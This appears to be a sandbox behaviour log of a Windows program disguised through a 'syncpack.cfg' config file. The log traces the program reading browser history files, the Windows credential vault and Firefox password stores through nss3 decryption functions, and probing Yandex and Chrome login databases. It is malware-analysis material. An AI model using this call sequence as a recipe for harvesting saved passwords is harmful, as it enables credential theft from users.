Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = FirefoxProfileFolder False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = FirefoxInstallFolder False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ChromeProfileFolder False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = OperaPasswordFile False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = WinPos False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Columns False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Sort, default_value = 0 True 1
Fn
System Get Info type = Operating System True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 True 92
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat, type = file_attributes False 1
Fn
Module Load module_name = pstorec.dll, base_address = 0x6fe60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Fn
Module Load module_name = vaultcli.dll, base_address = 0x70180000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultOpenVault, address_out = 0x701826a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultCloseVault, address_out = 0x70182718 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x70183099 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultFree, address_out = 0x70184321 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetInformation, address_out = 0x701824c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetItem, address_out = 0x70183242 True 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\history.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite, type = file_attributes True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite, type = time True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/p7ap74gw.default True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Fn
Registry Open Key reg_name = Mozilla Firefox\bin False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Open Key reg_name = Mozilla Firefox 25.0\bin True 1
Fn
Registry Read Value reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes True 1
Fn
Registry Enumerate Keys - False 1
Fn
Module Get Handle module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x0 False 1
Fn
Module Load module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x6ffc0000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x7007d70b True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x7007d13c True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x70013c51 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x70013333 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x6fffcbc4 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x6fffd3ca True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x700100a7 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\signons.sqlite, type = file_attributes True 1
Fn
Registry Open Key reg_name = Mozilla Firefox\bin False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Open Key reg_name = Mozilla Firefox 25.0\bin True 1
Fn
Registry Read Value reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes True 1
Fn
Registry Enumerate Keys - False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x6ffc0000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_open, address_out = 0x70121ca0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_prepare, address_out = 0x700ace70 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x70115200 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x700cd400 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int, address_out = 0x700cd3a0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int64, address_out = 0x700cd3d0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x700f9f60 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x700fbde0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_exec, address_out = 0x700fa270 True 1
Fn
Registry Open Key reg_name = Mozilla Firefox\bin False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Open Key reg_name = Mozilla Firefox 25.0\bin True 1
Fn
Registry Read Value reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes True 1
Fn
Registry Enumerate Keys - False 1
Fn
Module Get Handle module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x6ffc0000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x7007d70b True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x7007d13c True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x70013c51 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x70013333 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x6fffcbc4 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x6fffd3ca True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x700100a7 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryFullProcessImageNameW, address_out = 0x75fd15f7 True 1
Fn
Process Get filename file_name = C:\Windows\System32\taskhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x75fdd60f True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Get filename file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Get filename file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Get filename file_name = C:\Windows\System32\conhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files (x86)\Sea Monkey\nss3.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data, type = file_attributes False 1
Fn
